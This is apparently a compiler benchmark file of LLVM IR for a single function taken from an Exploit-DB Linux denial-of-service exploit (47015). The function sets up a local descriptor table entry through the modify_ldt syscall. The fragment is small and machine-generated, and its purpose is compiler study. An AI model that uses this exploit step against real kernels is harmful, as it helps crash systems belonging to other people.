; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/linux/dos/extr_47015.c_do_ldt.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/linux/dos/extr_47015.c_do_ldt.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

%struct.user_desc = type { i64, i32, i32, i32, i32, i32 }

@blah = common dso_local global i32 0, align 4
@__const.do_ldt.desc = private unnamed_addr constant %struct.user_desc { i64 ptrtoint (i32* @blah to i64), i32 -1, i32 1, i32 1, i32 0, i32 0 }, align 8
@__NR_modify_ldt = common dso_local global i32 0, align 4
@.str = private unnamed_addr constant [11 x i8] c"modify_ldt\00", align 1
@llvm.used = appending global [1 x i8*] [i8* bitcast (void ()* @do_ldt to i8*)], section "llvm.metadata"

; Function Attrs: noinline nounwind optnone uwtable
define internal void @do_ldt() #0 {
  %1 = alloca %struct.user_desc, align 8
  %2 = bitcast %struct.user_desc* %1 to i8*
  call void @llvm.memcpy.p0i8.p0i8.i64(i8* align 8 %2, i8* align 8 bitcast (%struct.user_desc* @__const.do_ldt.desc to i8*), i64 32, i1 false)
  %3 = load i32, i32* @__NR_modify_ldt, align 4
  %4 = call i64 @syscall(i32 %3, i32 17, %struct.user_desc* %1, i32 32)
  %5 = icmp ne i64 %4, 0
  br i1 %5, label %6, label %8

6:                                                ; preds = %0
  %7 = call i32 @err(i32 1, i8* getelementptr inbounds ([11 x i8], [11 x i8]* @.str, i64 0, i64 0))
  br label %8

8:                                                ; preds = %6, %0
  ret void
}

; Function Attrs: argmemonly nounwind willreturn
declare void @llvm.memcpy.p0i8.p0i8.i64(i8* noalias nocapture writeonly, i8* noalias nocapture readonly, i64, i1 immarg) #1

declare dso_local i64 @syscall(i32, i32, %struct.user_desc*, i32) #2

declare dso_local i32 @err(i32, i8*) #2


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
